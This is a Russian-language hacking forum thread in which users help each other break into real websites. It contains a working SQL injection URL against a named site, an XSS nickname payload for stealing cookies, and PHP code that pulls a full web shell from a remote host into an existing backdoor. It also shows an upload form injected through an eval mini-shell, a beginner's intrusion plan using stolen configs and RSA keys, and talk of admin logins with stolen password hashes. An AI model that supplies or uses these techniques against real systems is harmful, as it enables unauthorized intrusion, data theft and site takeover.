Спасибо. Теперь проблема в том, чтобы получить названия таблиц. Code: http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+ Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее.. Как получить нужные таблицы? PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.
Кто-нибудь может проконсультировать по XSS? Суть такая, короче зарегистровался на сайте под ником '><script>alert()</script> и какую бы страницу я не открыл выскакивает окошко-оповещение, как можно раскрутить?
Можно воровать кукисы, делать редиректы, впихивать вирусы. Да что угодно можно делать, главное - чтобы допустимая длинна логина позволяла вставить желаемый скрипт.
Ник можно очень много букв и цифр впихнуть, после того как я впихнул в ник свой код, как своровать кукисы? Ведь по логике админ должен пройти по какой-то ядовитой ссылке7
Code: http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+[B]where+table_schema=database()[/B]+limit+4,1+--+
На сайте есть минишелл eval(stripslashes($_GET[e])); allow_url_fopen On allow_url_include Off disable_functions exec,passthru,shell_exec,proc_open,popen Как залить полноценный шелл, если в том месте где лежит минишелл нет прав на заливку? т.е сделать аплоадер и залить в данную же папку не прокатит
Если бэкдор не в индексе то просто в него и запиши шелл(предварительно скопируй его содержимое) а там с шелла и смотри по бырому куда залиться. Code: $content=file_get_contents("http://yourshell.txt");$h=fopen("файл с мини шеллом",w);$text=$content;fwrite($h,$text);fclose($h); UPD А еще проще залей текст шелла без <?php и ?> на хост ,а потом ?yourbackdoor=eval(file_get_contents('http://site.ru/shell.txt')); и получишь полноценный шелл без заливки.
Такое не прокатывает какраз((( Вот таким методом выводится через минишелл. file.php?e=phpinfo(); Картинку, текстовый файл и т.п не закачать никак. Не позволяется никак. Файл править не могу, чтобы php вставить. Ранее нормально закачивал таким методом, но щас папка закрыта для правки: file.php?e=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>/form%3E
Добрый день. Прошу прощения за глупый вопрос, но что-то никак не могу решить для себя такую проблему: Хочу получить как можно более широкий доступ к нужному мне сайту, но в этом деле я-новичек. Поэтому сделал следующее: 1. Просканировал сайт акунетиксом (он нашел там читалку файлов, XSS, и поля для брута) 2. Просканировал сайт с помощью Wikto backend, используя структуру, построенную акунетиксом, нашел несколько "спрятанных" файлов, в том числе rsa-ключи для подключения к виртуальной сети 3. Просканировал сайт и виртуальную сеть Нмапом, нашел открытые порты и проассоциировал их с приложениями. 4. В расшаренных папках виртуальной сети ничего интересного не нашел. 5. Читалкой файлов прочитал и сохранил у себя все конфиги и ПХП-шки, какие смог найти. А теперь уперся в стену: сайт использует пофиксенный TBdev, с моими ущербными знаниями ПХП и мускуля трудно надеяться на нахождение инъекции и ее эксплуатацию, кроме того, насколько я понял, инъекция - это почти крайний случай (когда нет доступа к файлам, порты закрыты и т.д.). В моем-же случае есть открытые порты, могу читать файлы, и имею доступ к внутренней сети, но не знаю, как этим воспользоваться. Для себя выстроил следующий алгоритм: 1. Атака на открытые порты сайта и устройств сети (инфы и приложений не могу найти, Nmap почему-то не хочет запускать скрипты) 2. Поиск места хранения файлов базы данных и открытие их через читалку файлов (меня уверяют, что таких файлов не существует) 3. Анализ ПХП кода и составление действующих инъекций (не хватает знаний для анализа структуры кода, а программ, автоматизирующих этот процесс, по-видимому, тоже нет) 4. Брут по доступным формам авторизации (кажись, как-то натыкался на проги, поищу, но админ всегда залогинен, как это обойти, не знаю) 5. XSS (но про них даже еще не читал и пока слабо представляю принцип работы) 6. Помещение троянов во внутреннюю сеть (но это для меня вообще фантастика) Прошу помощи с литературой, методой и софтом, особенно по первым пунктам. Спасибо
собств. вопрос можно ли зная хеш и соль (sql инъекция) залогиниться в админку Vbulletin 4.0.2. хотелось бы узнать технику реализации.
так было гдето статья с помощью хэша и соли логинятся, но только админка при этом не доступна. а так в Вордпрессе можно логинится с помощью хэша без расшифровки актуально до самой последней версии, в джумле соотв. тоже (генерируют куки вот в этом и секрет)
если и есть такой способ, то это единичный случай с конкретной багой по конкретной версии, а так это фейк!
Мембер pinch просто, судя по всему, говоря про WP и Joomla, путает понятия обхода авторизации со сбросом пароля, и последующей авторизацией со своим, уже вновь заданным паролем. Если это так, то где-то тут на Ачате подобная статейка касательно WP точно проскакивала. А, вот, нашел, что я имел ввиду /thread359532.html В данной статье раскрывается метод сброса пароля для движка WP, при наличии доступа к БД сайта. И про Joomla там тоже упоминания есть, только в ее случае не все так просто. Надо будет, кстати, поставить плюсик автору статьи за труды. Интересная находка :3
сорь за оффтоп, ток вот не зря там люди жаловались на то что он спалил зту тему, так как и не прошло и 2 недели после его поста как было сделано обновление ворд пресса в котором лавочка прикрылась.